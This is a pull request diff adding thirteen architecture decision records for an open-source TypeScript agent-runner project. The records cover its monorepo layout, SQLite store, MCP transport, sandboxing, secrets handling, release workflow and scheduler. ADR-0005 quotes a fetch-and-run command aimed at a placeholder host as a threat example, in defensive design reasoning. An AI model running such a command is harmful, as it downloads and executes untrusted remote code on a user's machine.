### PR TITLE
docs: add 13 starter ADRs capturing architecture decisions

### DIFF
--- a/docs/adr/0001-monorepo-with-npm-workspaces.md
+++ b/docs/adr/0001-monorepo-with-npm-workspaces.md
@@ -1,0 +1,60 @@
+# ADR-0001: Monorepo with npm workspaces
+
+## Status
+Accepted
+
+## Context
+
+A greenfield TypeScript project needed a code layout. Two realistic choices:
+
+- **Single package** — one `src/` directory, one `package.json`, ship as one
+  npm package. Fastest to start, but refactoring into multiple packages later
+  means changing every import and test.
+- **Monorepo** — multiple `packages/*` each with their own `package.json` and
+  `tsconfig.json`, npm workspaces tying them together. More build config up
+  front. Each package publishable to npm independently.
+
+Because this project is **community-first** (MIT, public repo, people expected
+to build on top of individual pieces), external consumers wanting only the
+types or only the MCP server matters. Bundling the whole thing into a single
+package forces people to install Temporal just to use the YAML schema.
+
+A brief diversion into Turborepo was considered and rejected — for 4-5
+packages, workspace tooling from npm directly is sufficient and has zero extra
+dependencies.
+
+## Decision
+
+Monorepo with npm workspaces. Five packages:
+
+- `@some-useful-agents/core` — types, schemas, agent loader, run store,
+  LocalProvider, env builder, secrets store, scheduler, LLM invoker
+- `@some-useful-agents/cli` — the `sua` binary
+- `@some-useful-agents/mcp-server` — MCP server (HTTP/SSE)
+- `@some-useful-agents/temporal-provider` — Temporal workflows + worker
+- `@some-useful-agents/dashboard` — future web UI
+
+All packages ship independently. Versions track together via changesets
+fixed-versioning while the project is v0.x.
+
+## Consequences
+
+**Easier:**
+- Consumers can `npm install @some-useful-agents/core` and build on the types
+  without pulling in Temporal or the CLI.
+- Build cache invalidation works per-package.
+- The mental separation of concerns is enforced by TypeScript project
+  references — CLI literally cannot depend on internal details of
+  mcp-server unless exported.
+
+**Harder:**
+- Every package has its own `package.json` and `tsconfig.json` to maintain.
+- Internal dependencies use `"@some-useful-agents/core": "*"` which npm
+  workspaces resolves to the local package during dev.
+- Changesets must be configured to fixed-bump all packages together (see
+  ADR-0009) or contributors have to remember which packages their change
+  affects.
+
+**Trade-offs accepted:**
+- The initial commit is ~30 files of config boilerplate before any real logic.
+  With LLM-assisted tooling, this cost is measured in minutes, not days.

--- a/docs/adr/0002-sqlite-via-node-builtin.md
+++ b/docs/adr/0002-sqlite-via-node-builtin.md
@@ -1,0 +1,58 @@
+# ADR-0002: SQLite via `node:sqlite` built-in
+
+## Status
+Accepted
+
+## Context
+
+The run store needs a persistent datastore. Requirements:
+
+- Local, single-user; no server required
+- Queryable — listing recent runs by agent name, status, time range
+- Concurrent-safe — CLI and MCP server can both write simultaneously
+- Zero-config for new users
+- Works on macOS / Linux / Windows
+
+Candidates considered:
+
+1. **JSON file per run** (`data/runs/<uuid>.json`) — our original plan.
+   Dead-simple but no queries, no indexing; `list runs from last hour` means
+   a full directory scan and parse. The moment the dashboard needs even
+   basic filtering it becomes a rewrite.
+
+2. **better-sqlite3** — popular, mature. Native addon; requires compilation
+   on install. Breaks for some contributors on odd platforms. Adds a build
+   step to every install.
+
+3. **node:sqlite** — built into Node.js 22.5+ as of 2024. Zero native deps,
+   zero install-time overhead, shipped with the runtime. Works on every
+   platform Node supports. API is similar to better-sqlite3 but newer with
+   less battle-testing.
+
+## Decision
+
+Use `node:sqlite` directly. Pin Node 22.5+ via `.nvmrc` and `engines` field.
+
+Enable WAL mode (`PRAGMA journal_mode=WAL`) on connect so concurrent CLI +
+MCP writes don't block each other.
+
+## Consequences
+
+**Easier:**
+- Contributor onboarding has zero install-time native compilation.
+- Publishing to npm works from any CI runner without setup-cpp or prebuilt
+  binary matrices.
+- Platform support is identical to Node's.
+
+**Harder:**
+- `node:sqlite` is newer than better-sqlite3; edge cases we haven't hit yet
+  may lurk.
+- Type declarations for `node:sqlite` changed once already between Node
+  minor versions; we had to pin a specific `SqlValue` type shape locally.
+- Anyone stuck on Node < 22.5 can't use the project. We don't try to support
+  older LTS.
+
+**Trade-offs accepted:**
+- Slightly less battle-testing vs better-sqlite3. The project is a local
+  playground, not a high-concurrency service. If we hit a bug, we can swap
+  back to better-sqlite3 with a 20-line shim.

--- a/docs/adr/0003-mcp-http-sse-transport.md
+++ b/docs/adr/0003-mcp-http-sse-transport.md
@@ -1,0 +1,49 @@
+# ADR-0003: MCP via HTTP/SSE streamable transport
+
+## Status
+Accepted
+
+## Context
+
+The MCP (Model Context Protocol) SDK supports two transports for servers:
+
+- **stdio** — the MCP client spawns the server as a child process and
+  communicates over pipes. Typical for local single-client setups.
+- **Streamable HTTP (SSE)** — the server runs as an HTTP service; clients
+  connect via POST + SSE. Supports multiple concurrent clients.
+
+Our architecture has multiple consumers of agent state: the CLI reads
+directly, the future dashboard will poll, and Claude Code wants to list and
+run agents via MCP. With stdio, only one client can connect at a time
+(whoever spawned the server). A parallel concern: the MCP server container
+would need to run as a long-lived HTTP service anyway for the dashboard,
+making stdio awkward.
+
+The outside-voice review during PR #3 flagged this explicitly: "MCP via stdio
+= one client at a time. Will force rewrite to HTTP/SSE before Phase 3 is
+done."
+
+## Decision
+
+Use streamable HTTP transport. The MCP server runs as a persistent HTTP
+service on a configurable port (default `3003`, overridable via
+`SUA_MCP_PORT` or `sua.config.json`). Claude Code connects via
+`http://localhost:3003/mcp`.
+
+## Consequences
+
+**Easier:**
+- Multiple simultaneous clients (CLI, dashboard, Claude Code) all work.
+- The server is a normal lifecycle concern — `sua mcp start` runs it, pm2
+  or launchd can daemonize it, standard HTTP debugging tools apply.
+- Future remote access (behind auth) becomes a config change, not a rewrite.
+
+**Harder:**
+- Client configuration: users add an HTTP URL to their Claude Code settings
+  instead of a spawn command. Slightly more setup friction.
+- Port conflicts are possible; the project originally picked `3001`, then
+  discovered the user had another MCP on that port. Made it configurable.
+
+**Trade-offs accepted:**
+- For single-client setups, stdio would have been simpler. The multi-client
+  requirement (even eventual) makes HTTP the correct default.

--- a/docs/adr/0004-temporal-worker-on-host.md
+++ b/docs/adr/0004-temporal-worker-on-host.md
@@ -1,0 +1,52 @@
+# ADR-0004: Temporal worker runs on host, not Docker
+
+## Status
+Accepted
+
+## Context
+
+Temporal workflows execute via workers that pull tasks from the Temporal
+server. Those workers run user code — for this project, the user code is
+spawning `bash -c '<command>'` or `claude --print`.
+
+Natural instinct: containerize everything. Put the Temporal server, the
+worker, and the MCP server all in `docker-compose.yml`. Clean, reproducible,
+one-command startup.
+
+Problem: the worker needs to execute shell commands on the user's system.
+If the worker runs in Docker, "shell agent" becomes "shell command inside
+the container." That container doesn't have the user's dev tools, API
+credentials, or home directory. For claude-code agents, it would need the
+user's Claude CLI installation, API key, and subscription — which means
+mounting `~/.claude` into the container, at which point the "sandbox" has
+leaked the keys to the kingdom anyway.
+
+## Decision
+
+The Temporal **server** runs in Docker (via `docker-compose.yml`). The
+Temporal **worker** runs on the host (`sua worker start`). The server is
+pure infrastructure and benefits from Docker; the worker needs host access
+and doesn't benefit.
+
+## Consequences
+
+**Easier:**
+- Workers spawn shell commands with full access to the user's tools, PATH,
+  and files. No volume mount gymnastics.
+- `claude --print` works because the worker runs next to the user's Claude
+  CLI install.
+- Local development: edit code, restart worker with `sua worker start`. No
+  rebuild-image cycle.
+
+**Harder:**
+- Users must run `sua worker start` in a separate terminal (or daemonize it)
+  to use the Temporal provider. `sua agent run --provider temporal`
+  without a worker hangs, so we added a 5-second pending-timeout warning
+  that tells users exactly what's wrong.
+- The deployment story is less "one-command-all-in-Docker" than users
+  might expect. The README calls this out.
+
+**Trade-offs accepted:**
+- Host execution means the worker gets everything the invoking user has.
+  This is by design: trust boundaries are enforced at the agent definition
+  layer (see ADR-0005 and ADR-0006), not at the worker layer.

--- a/docs/adr/0005-shell-sandbox-claude-on-host.md
+++ b/docs/adr/0005-shell-sandbox-claude-on-host.md
@@ -1,0 +1,61 @@
+# ADR-0005: Shell agents sandboxed in Docker; claude-code agents on host
+
+## Status
+Accepted
+
+## Context
+
+Agents come from three sources: `agents/examples/` (ships with the repo),
+`agents/local/` (user-written), and `agents/community/` (contributed, in
+the repo catalog but not installed until the user opts in). Community
+shell agents could contain `curl evil.com/payload | bash`.
+
+Two axes of exposure:
+
+1. **Shell agents** — deterministic and inspectable. Reading the YAML tells
+   you exactly what will run.
+2. **Claude-code agents** — non-deterministic. Claude decides what to do
+   with the prompt. Even a benign-looking prompt can invoke any tool
+   Claude has available.
+
+The outside-voice review called the current approach "backwards" — shell is
+the safer type and we sandbox it; claude-code is the riskier type and we
+trust it. Fair point. But sandboxing claude-code agents is meaningfully
+harder: Claude needs the user's API key, Claude's config directory, and
+often the user's working directory to be useful. Any Docker sandbox that
+mounts all of that gives the container everything it would need to do
+damage anyway.
+
+Meanwhile, Claude Code already has a **permission model** — tool
+allowlists, working directory scoping, `--allowedTools` flag. These are
+enforced by Claude itself, not by the sandbox.
+
+## Decision
+
+**Shell agents** run in a Docker sandbox (restricted container, read-only
+working directory mount, network isolation). Applies especially to agents
+loaded from `agents/community/` that the user opted into installing.
+
+**Claude-code agents** run on the host. Claude's own permission model
+(allowedTools, working directory scoping) is the sandbox. Docs explicitly
+name this trust boundary.
+
+## Consequences
+
+**Easier:**
+- Shell agents from the community catalog can't `rm -rf ~` by accident.
+- Claude-code agents work without API key leakage into a container.
+- No dual-maintenance burden: the shell sandbox doesn't need a way to
+  tunnel Claude creds through.
+
+**Harder:**
+- Users must understand the trust-boundary distinction when writing agents
+  or importing them. The CONTRIBUTING.md security checklist calls this out.
+- A determined attacker writing a malicious claude-code agent prompt could
+  attempt prompt injection to bypass Claude's safeguards. That's Claude's
+  problem, not ours — but it's a consequence.
+
+**Trade-offs accepted:**
+- Sandboxing claude-code agents more aggressively is future work, and would
+  require Anthropic changes (ephemeral credentials, scoped tokens) to be
+  meaningfully stronger than what Claude already provides.

--- a/docs/adr/0006-env-filtering-by-trust-level.md
+++ b/docs/adr/0006-env-filtering-by-trust-level.md
@@ -1,0 +1,61 @@
+# ADR-0006: Env filtering by trust level
+
+## Status
+Accepted
+
+## Context
+
+The original agent executor did this:
+
+```typescript
+const env = { ...process.env, ...(agent.env ?? {}) };
+```
+
+Every spawned agent inherited the full `process.env`. This meant a community
+agent from `agents/community/` — potentially written by a stranger — got
+access to `AWS_SECRET_ACCESS_KEY`, `GITHUB_TOKEN`, `ANTHROPIC_API_KEY`,
+`DATABASE_URL`, and anything else the user had in their shell.
+
+Classic supply-chain risk: malicious agent prints or POSTs out whatever
+secrets the shell session has.
+
+The fix needed to be non-invasive for local agents (which the user wrote
+and expects to work) while tight for community agents (which the user may
+not have inspected).
+
+## Decision
+
+Build a per-agent env from a filtered subset of `process.env`, based on a
+**trust level** derived from the agent's source directory:
+
+| Source | Trust | Inherits |
+|--------|-------|----------|
+| `agents/examples/` or `agents/local/` | `local` | `PATH`, `HOME`, `USER`, `SHELL`, `LANG`, `LC_*`, `TERM`, `TMPDIR`, `NODE_ENV`, `TZ` + agent's `envAllowlist` |
+| `agents/community/` | `community` | `PATH`, `HOME`, `LANG`, `TERM`, `TMPDIR` + agent's `envAllowlist` |
+
+Secrets the agent declares via `secrets: [FOO]` are resolved from the
+encrypted store and injected after the filtered `process.env`. The agent's
+own `env: { KEY: value }` YAML block is applied last as explicit overrides.
+
+Warnings are emitted when an `env` value looks like a hardcoded secret
+(key contains KEY/SECRET/TOKEN/PASSWORD/AUTH, value >= 20 chars) suggesting
+the user move it to the secrets store instead.
+
+## Consequences
+
+**Easier:**
+- Community agents literally cannot see `AWS_SECRET_ACCESS_KEY`, regardless
+  of how careful the user is about their shell environment.
+- Local agents work the way users expect because PATH, HOME, shell
+  defaults, and language settings are all there.
+- Adding a custom allowed env var is explicit: `envAllowlist: [MY_CUSTOM]`.
+
+**Harder:**
+- Users porting agents from elsewhere may hit "env var not set" in community
+  agents and need to either declare it as a secret or add it to
+  `envAllowlist`. Error message tells them both options.
+
+**Trade-offs accepted:**
+- The allowlist for `local` is permissive. Anyone who writes a local agent
+  can exfiltrate their own secrets, but they authored the agent, so there's
+  no trust boundary to protect.

--- a/docs/adr/0007-encrypted-file-secrets-store.md
+++ b/docs/adr/0007-encrypted-file-secrets-store.md
@@ -1,0 +1,65 @@
+# ADR-0007: Encrypted file secrets store with machine-bound key
+
+## Status
+Accepted
+
+## Context
+
+Agents need to reference secrets (API keys, webhook URLs, tokens) without
+those values ending up in YAML that gets committed or shared. Options:
+
+1. **Plaintext `.env` file** — familiar, but every AI coding tool now reads
+   `.env` automatically, and committing it by mistake is a recurring
+   production outage in the industry. Not acceptable for a tool that
+   actively encourages storing secrets.
+
+2. **OS keychain** (macOS Keychain, libsecret, Windows Credential Manager)
+   via a Node wrapper like `keytar` — strongest security but adds a native
+   addon dependency. Native addons break on various platforms (musl libc,
+   Alpine containers, Node version mismatches, Windows without Visual
+   Studio Build Tools).
+
+3. **Encrypted file** — store a ciphertext blob. Requires a key. For a
+   single-user local tool, deriving the key from something machine-specific
+   (hostname + username) is the usual pattern.
+
+For v1 we wanted something that works **everywhere** without asking users to
+install native toolchains.
+
+## Decision
+
+Use an encrypted file at `<dataDir>/secrets.enc` with AES-256-GCM. Key
+derived via scrypt from `hostname + userInfo().username`. File permissions
+`0600`. Versioned payload format so we can migrate later.
+
+This is **obfuscation-grade**, not vault-grade. It prevents:
+
+- Accidental exposure via `cat`, `less`, search-indexer, or AI tooling
+- Cross-user reads on shared machines
+
+It does **not** prevent:
+
+- An attacker with your hostname + username + filesystem access
+- Memory-dump attacks
+- Anything beyond casual read
+
+OS keychain integration is planned as Phase S3, optional and auto-detected.
+
+## Consequences
+
+**Easier:**
+- Zero native deps. Pure Node `crypto`. Works in Docker, CI, on every
+  platform Node supports.
+- Single-file backup: copy `secrets.enc` to a new machine with the same
+  hostname+username and it decrypts. (Which is also a weakness.)
+
+**Harder:**
+- Secrets do NOT portably roam across machines. Moving to a new machine
+  requires re-running `sua secrets set` for each value.
+- Loss of the file = loss of all secrets. No recovery path other than the
+  original source of truth.
+
+**Trade-offs accepted:**
+- Obfuscation-grade is good enough for a local playground. Users with real
+  security needs can wait for the OS keychain integration (Phase S3) or
+  bring their own vault via `.env` pointing to `$(vault read ...)` output.

--- a/docs/adr/0008-npm-trusted-publishing.md
+++ b/docs/adr/0008-npm-trusted-publishing.md
@@ -1,0 +1,66 @@
+# ADR-0008: npm Trusted Publishing via OIDC
+
+## Status
+Accepted
+
+## Context
+
+Publishing packages to npm from CI traditionally requires a long-lived
+`NPM_TOKEN`. That token sits in a GitHub Actions secret, is used on every
+publish, and has broad scope (anything the token owner can publish).
+
+Known failure modes:
+
+- **Token leaks** via mistyped workflow, logs, or malicious contributor
+  injecting a step that echoes it.
+- **Rotation fatigue** — nobody rotates their npm tokens quarterly.
+- **Scope overreach** — automation tokens often have `read and write` to
+  the entire account, not just the target org.
+
+npm shipped **Trusted Publishing (OIDC)** in July 2025. CI exchanges a
+short-lived OIDC token with npm directly. No secret is stored. The token
+is cryptographically bound to:
+
+- The specific GitHub repository
+- The specific workflow file
+- The specific GitHub Environment
+
+## Decision
+
+Use Trusted Publishing. Configure each published package at
+`npmjs.com/package/<name>/access` with:
+
+- Publisher: GitHub Actions
+- Organization: `gregmeyer`
+- Repository: `some-useful-agents`
+- Workflow filename: `release.yml`
+- Environment: `npm-publish`
+
+Remove `NPM_TOKEN` from GitHub Secrets entirely. Workflow uses
+`permissions: id-token: write` for OIDC.
+
+Provenance attestations are published automatically (no `--provenance` flag
+needed) so consumers can verify each package came from this repo + workflow.
+
+## Consequences
+
+**Easier:**
+- No token to rotate, leak, or manage.
+- Each publish's provenance is verifiable by anyone: `npm view <pkg> attestations`.
+- Supply-chain compromise requires breaking into GitHub Actions' OIDC
+  provider, not stealing a secret.
+
+**Harder:**
+- One-time bootstrap: each package must be manually published once (with
+  user credentials) so it exists in the registry before Trusted Publisher
+  can be configured for it.
+- Provenance verification checks that `package.json`'s `repository.url`
+  matches the OIDC claim's repo — caught this the hard way when our first
+  release failed because `repository.url` wasn't set per-package (fixed in
+  PR #11).
+- Requires npm CLI >= 11.5.1, which means the release workflow runs on
+  Node 24 (ships with npm 11) rather than our default Node 22.
+
+**Trade-offs accepted:**
+- Bootstrap friction for a one-time setup. Future repos can follow the
+  pattern documented in CONTRIBUTING.md.

--- a/docs/adr/0009-changesets-for-versioning.md
+++ b/docs/adr/0009-changesets-for-versioning.md
@@ -1,0 +1,62 @@
+# ADR-0009: Changesets for version management
+
+## Status
+Accepted
+
+## Context
+
+A monorepo with 5 packages needs a story for:
+
+- Deciding what's in a release
+- Generating a CHANGELOG
+- Bumping versions
+- Coordinating package versions (do they track together or independently?)
+
+Options considered:
+
+1. **Manual** — maintainer edits each `package.json` and `CHANGELOG.md` by
+   hand. Doesn't scale past one maintainer.
+2. **Semantic-release** — commit-message-driven. Every merge to main
+   potentially triggers a release. Hard to batch multiple PRs into one
+   version bump.
+3. **Changesets** — contributors describe changes in `.changeset/*.md`
+   files alongside their PR. A bot opens a "Release PR" aggregating pending
+   changesets. Merging the Release PR cuts the version.
+
+Changesets is the de-facto standard in the JS ecosystem for monorepos
+(Turborepo, shadcn/ui, Radix UI all use it).
+
+## Decision
+
+Adopt Changesets with **fixed versioning**: all 5 `@some-useful-agents/*`
+packages bump to the same version together. Configured via the `fixed` key
+in `.changeset/config.json`.
+
+CI workflow runs Changesets on every push to main:
+
+- If pending changesets exist: open/update a Release PR with version bumps
+  + generated CHANGELOG
+- If a Release PR's version bumps have been merged: publish to npm
+
+## Consequences
+
+**Easier:**
+- Contributors write `.changeset/my-feature.md` describing their change in
+  plain English. The bot does the CHANGELOG mechanics.
+- Batched releases: multiple PRs accumulate in one Release PR, making each
+  version cut a reviewable diff.
+- CHANGELOG quality: forced to write user-facing descriptions instead of
+  machine-formatted commit messages.
+
+**Harder:**
+- Fixed versioning means a patch to one package bumps all five to the same
+  version number. Could be wasteful when only one package changed. Fine
+  while the project is v0.x and all packages share a release cadence; we'll
+  revisit when packages mature at different rates.
+- Contributors need to remember to run `npx changeset` as part of their PR.
+  CONTRIBUTING.md documents this. CI does not enforce it yet; a future
+  improvement is a GitHub Action that fails if a source file changed but
+  no changeset is present.
+
+**Trade-offs accepted:**
+- Slight contributor overhead for much better release hygiene.

--- a/docs/adr/0010-environment-gated-release.md
+++ b/docs/adr/0010-environment-gated-release.md
@@ -1,0 +1,62 @@
+# ADR-0010: Environment-gated release workflow
+
+## Status
+Accepted
+
+## Context
+
+With Changesets (ADR-0009) and Trusted Publishing (ADR-0008) in place, a
+question remained: **when does a publish actually happen?**
+
+Default Changesets setup: merging a Release PR triggers an automatic publish.
+For most projects that's fine. For a project where any merge to main can
+trigger the publish step, it means:
+
+- Any maintainer with merge rights can publish without a review moment
+- A compromised maintainer account = silent publish
+- Accidental merge of a stale Release PR = accidental publish
+
+The original PR #7 had this flaw. When the user asked "is it a good idea to
+allow anyone to publish?" — no, it wasn't.
+
+GitHub Actions supports **Environments** with **required reviewers**. A job
+running in an environment pauses until a reviewer clicks approve in the
+Actions UI.
+
+## Decision
+
+The release workflow's `Version PR or Publish` job declares
+`environment: npm-publish`. The `npm-publish` environment has required
+reviewers (repo maintainers).
+
+Concretely:
+
+1. Merge to main (regular PR or Release PR)
+2. Workflow starts, immediately pauses at the environment gate
+3. Reviewer clicks **Review deployments → Approve**
+4. Job runs — opens Release PR, or publishes to npm if this merge was a
+   Release PR
+
+## Consequences
+
+**Easier:**
+- Every publish requires an explicit "yes" from a human who looked at what
+  was about to ship.
+- The gate protects against both mistakes and hostile actors — even if
+  someone's account is compromised, they can't publish without the 2FA +
+  session on the approval click.
+- Works cleanly with Trusted Publishing: the OIDC token's environment
+  claim is `npm-publish`, bound at the npm side as a required publisher
+  match.
+
+**Harder:**
+- One extra click per release. Annoying for rapid small releases; valuable
+  for security.
+- Bootstrap confusion: if the environment doesn't exist when the workflow
+  first runs, GitHub auto-creates it with no reviewers, bypassing the gate.
+  The fork-setup instructions explicitly say to create the environment
+  before the first workflow run.
+
+**Trade-offs accepted:**
+- Release cadence is bounded by a human's attention. Fine for this
+  project's scope. Fast-moving projects can widen the reviewer list.

--- a/docs/adr/0011-slack-webhooks-not-oauth.md
+++ b/docs/adr/0011-slack-webhooks-not-oauth.md
@@ -1,0 +1,78 @@
+# ADR-0011: Slack via incoming webhooks, not OAuth
+
+## Status
+Proposed
+
+## Context
+
+A near-term roadmap item is notifications — when a scheduled agent runs,
+post the result somewhere the user will see it (Slack, email, file
+append, dashboard, etc.). For Slack specifically, two integration paths:
+
+1. **Incoming webhooks** — the user creates an app in their Slack
+   workspace, enables incoming webhooks, gets a URL like
+   `https://hooks.slack.com/services/T.../B.../xxx`. POST JSON to that URL
+   and it posts in the channel. One-time ~5-minute setup. No OAuth flow.
+
+2. **OAuth** — user authorizes the sua app via Slack's OAuth flow. Gets a
+   refresh-capable bot token that can post as an app, read channels,
+   manage users, etc. Requires:
+   - A registered Slack app (the sua maintainers must maintain one)
+   - A redirect URL (the OAuth callback)
+   - Token storage and refresh logic
+   - A public HTTPS endpoint for the callback — **problematic for a CLI
+     tool with no public web surface**
+
+The OAuth route's redirect-URL requirement is the killer. sua runs
+locally. There's no `https://sua.example.com/oauth/callback`. You'd need
+to spin up a local server on a known port, direct the Slack OAuth to it,
+handle the callback, and close the loop. Doable but adds meaningful
+complexity for ~zero benefit over webhooks in the local-notifications
+use case.
+
+## Decision
+
+Use Slack **incoming webhooks**. Users configure their webhook once in
+their Slack workspace, then:
+
+```bash
+sua secrets set SLACK_WEBHOOK <url>
+```
+
+Agent YAML references it:
+
+```yaml
+name: daily-digest
+secrets: [SLACK_WEBHOOK]
+notify:
+  slack: { webhook: SLACK_WEBHOOK }  # future notify schema
+```
+
+The notify handler reads `process.env.SLACK_WEBHOOK` (injected from the
+encrypted secrets store via env-builder) and POSTs the run result.
+
+OAuth is **explicitly rejected** for this use case. If a future user needs
+OAuth (for, e.g., reading channel contents programmatically, acting as a
+bot user), that's a separate integration and different ADR.
+
+## Consequences
+
+**Easier:**
+- Zero auth infrastructure to maintain.
+- User setup: 5 minutes in Slack UI, one `sua secrets set` command.
+- Works today once notify handlers are built — secrets infra is already
+  shipped (ADR-0007).
+
+**Harder:**
+- Limited to posting-only. Can't read channels, edit messages, DM users,
+  or do anything richer.
+
+**Trade-offs accepted:**
+- The richer Slack integrations are out of scope for a local scheduled-
+  agent tool. If the project ever evolves into a team collaboration
+  platform, OAuth gets revisited.
+
+## Status notes
+
+Marked **Proposed** because notify handlers aren't shipped yet. Upgrade to
+**Accepted** when the first notify handler lands.

--- a/docs/adr/0012-local-cron-scheduler-node-cron.md
+++ b/docs/adr/0012-local-cron-scheduler-node-cron.md
@@ -1,0 +1,69 @@
+# ADR-0012: Local cron scheduler via node-cron
+
+## Status
+Accepted
+
+## Context
+
+The agent YAML schema has always had a `schedule: "<cron>"` field. Until
+PR #12, no code actually read it. Agents declared schedules but they
+never fired. Users expecting "I'll write a YAML with a cron string and it
+runs daily" hit silent failure.
+
+Two paths to fix this:
+
+1. **Use Temporal's Schedules API** — the TemporalProvider could own
+   scheduling. Robust, survives restarts, integrates with Temporal Web UI.
+   But requires Docker + a running Temporal server — a lot to ask for a
+   "run this shell command daily" use case.
+
+2. **Run cron locally in the LocalProvider** — a Node process reads agent
+   YAMLs with schedule fields and fires them on cron expressions. Zero
+   new infrastructure. Works immediately after `sua init`.
+
+The local path hits the common case (first-run user wants a scheduled
+dad-joke) without infrastructure cost. Temporal scheduling is still
+valuable for agents that need durability, but it's an additive feature,
+not a prerequisite.
+
+## Decision
+
+Add a `LocalScheduler` class in `@some-useful-agents/core` using
+[node-cron](https://github.com/node-cron/node-cron). Zero native deps,
+MIT-licensed, supports 5- and 6-field cron expressions.
+
+New CLI commands:
+
+- `sua schedule start` — foreground daemon. Loads agents with schedule
+  fields, registers cron tasks, fires each on its expression.
+  `triggeredBy: 'schedule'` on the resulting Run records.
+- `sua schedule list` — shows agents with schedule fields + validation.
+- `sua schedule validate <name>` — checks a specific agent's cron string.
+
+`sua doctor` reports the scheduler as ready and counts scheduled agents.
+
+For daemon behavior (run unattended), users daemonize with pm2, launchd,
+or systemd. Not sua's concern in v1.
+
+## Consequences
+
+**Easier:**
+- `sua init && sua tutorial` can realistically end with a scheduled agent,
+  zero additional setup.
+- Agent YAML `schedule` field is no longer a lie.
+- Testing: a 6-field cron expression (`* * * * * *`) fires every second,
+  making scheduler tests run in ~1.5s with real cron.
+
+**Harder:**
+- Hot reload: agents added after `sua schedule start` don't pick up until
+  the daemon restarts. Documented; a file-watcher is future work.
+- Two competing scheduler concepts long-term: LocalScheduler and Temporal
+  Schedules. Temporal users running `sua schedule start` would
+  double-fire. Mitigated by detecting provider at schedule-start time and
+  refusing to run local scheduler if provider is Temporal. (Future.)
+
+**Trade-offs accepted:**
+- A foreground daemon approach is simpler than full system-service
+  integration. Users wanting true "fire at 9am even when laptop is
+  asleep" need OS-level scheduling (launchd, systemd timer) layered on
+  top — doc-only for now.

--- a/docs/adr/0013-tutorial-and-dad-joke-example.md
+++ b/docs/adr/0013-tutorial-and-dad-joke-example.md
@@ -1,0 +1,81 @@
+# ADR-0013: Onboarding tutorial + dad-joke example agent
+
+## Status
+Accepted
+
+## Context
+
+After shipping npm publishing (v0.2.0), a fresh `npx @some-useful-agents/cli`
+install still gave users an empty directory. `sua init` created config but
+scaffolded nothing. A brand-new user had to:
+
+1. Read the README
+2. Hand-write a YAML file to an unfamiliar schema
+3. Guess which command to run
+4. Repeat for every concept (chaining, secrets, scheduling)
+
+This is the highest-leverage surface for adoption. If the first five
+minutes don't feel magical, the tool doesn't get past the tab they opened
+it in. Docs can teach "what is sua" — but docs go stale, users skip them,
+and LLMs are now answering most how-do-I-start questions anyway.
+
+Two big design choices emerged:
+
+### Walkthrough style: fixed vs fully LLM-driven
+
+- **Fixed script** — sua owns the steps. Deterministic. Testable. Same
+  ending state for every user.
+- **LLM-driven** — sua hands Claude (or Codex) a system prompt describing
+  itself and lets the LLM run the conversation. More flexible, less
+  predictable, breaks when the LLM version drifts.
+
+### Ending state: abstract or concrete
+
+- **Abstract** — the tutorial shows the concepts but the user provides
+  their own agent.
+- **Concrete** — the tutorial builds a specific real agent, runs it, and
+  schedules it.
+
+### The example agent itself
+
+Options considered: weather (needs API key), news (requires subjective
+source), quote-of-the-day (bland), hello-world (no scheduling value),
+dad-joke from icanhazdadjoke.com (fun, free, no auth, HTTP call,
+schedulable).
+
+## Decision
+
+**Structure: fixed-script walkthrough with optional LLM deep-dives.** sua
+drives 5 deterministic stages. At each stage, the user can type `explain`
+to get Claude or Codex to riff on that specific concept. The LLM is an
+enhancer; sua owns the flow.
+
+**Ending state: concrete and scheduled.** The walkthrough scaffolds a real
+`dad-joke.yaml`, runs it live (user sees an actual dad joke), and
+optionally adds `schedule: "0 9 * * *"` to schedule it daily.
+
+**Example: dad-joke.** Concrete, safe, external API call, scheduling value
+is obvious ("I get a joke at 9am"), zero setup cost.
+
+`sua init` also scaffolds a simpler `hello.yaml` so even users who skip the
+tutorial get a non-empty `sua agent list` result.
+
+## Consequences
+
+**Easier:**
+- First-run is one command: `sua tutorial`. No doc-reading required.
+- Debugging: every stage is a deterministic prose block + a scripted action.
+  Failure messages point at the specific stage.
+- Works without any LLM CLI installed; the `explain` feature just disables.
+
+**Harder:**
+- Tutorial must be maintained as features evolve. If chaining syntax
+  changes, stage 4 may need an update. This is actually a feature: keeps
+  the docs from going stale.
+- LLM deep-dives depend on Claude or Codex being installed. Users without
+  either get the walkthrough minus enrichment. Documented.
+
+**Trade-offs accepted:**
+- Tutorial is a new maintenance surface area. For the adoption win, worth
+  it. A slot-based architecture (stages as an array of step objects) keeps
+  editing individual stages cheap.

--- a/docs/adr/README.md
+++ b/docs/adr/README.md
@@ -1,0 +1,61 @@
+# Architecture Decision Records
+
+This directory captures the **why** behind architectural choices in
+`some-useful-agents`. Code tells you what. ADRs tell you why.
+
+## Index
+
+| # | Title | Status |
+|---|-------|--------|
+| [0001](0001-monorepo-with-npm-workspaces.md) | Monorepo with npm workspaces | Accepted |
+| [0002](0002-sqlite-via-node-builtin.md) | SQLite via `node:sqlite` built-in | Accepted |
+| [0003](0003-mcp-http-sse-transport.md) | MCP via HTTP/SSE streamable transport | Accepted |
+| [0004](0004-temporal-worker-on-host.md) | Temporal worker runs on host, not Docker | Accepted |
+| [0005](0005-shell-sandbox-claude-on-host.md) | Shell agents sandboxed in Docker; claude-code agents on host | Accepted |
+| [0006](0006-env-filtering-by-trust-level.md) | Env filtering by trust level | Accepted |
+| [0007](0007-encrypted-file-secrets-store.md) | Encrypted file secrets store with machine-bound key | Accepted |
+| [0008](0008-npm-trusted-publishing.md) | npm Trusted Publishing via OIDC | Accepted |
+| [0009](0009-changesets-for-versioning.md) | Changesets for version management | Accepted |
+| [0010](0010-environment-gated-release.md) | Environment-gated release workflow | Accepted |
+| [0011](0011-slack-webhooks-not-oauth.md) | Slack via incoming webhooks, not OAuth | Proposed |
+| [0012](0012-local-cron-scheduler-node-cron.md) | Local cron scheduler via node-cron | Accepted |
+| [0013](0013-tutorial-and-dad-joke-example.md) | Onboarding tutorial + dad-joke example | Accepted |
+
+## Template
+
+Use the [MADR-lite](https://adr.github.io/madr/) format. Keep each ADR to one
+page. The goal is captured judgment, not exhaustive prose.
+
+```markdown
+# ADR-NNNN: Title
+
+## Status
+Accepted | Proposed | Superseded by ADR-XXXX
+
+## Context
+What's the problem? What forced this decision?
+
+## Decision
+What did we choose and why?
+
+## Consequences
+What trade-offs are we accepting? What becomes easier? What becomes harder?
+```
+
+## When to write an ADR
+
+- Any decision that shapes the codebase for 6+ months
+- Any decision you'd have to re-explain to a new contributor
+- Any decision that rejects an obvious alternative (the "why not X" matters)
+
+## When NOT to write an ADR
+
+- Small refactors, bug fixes, dependency bumps
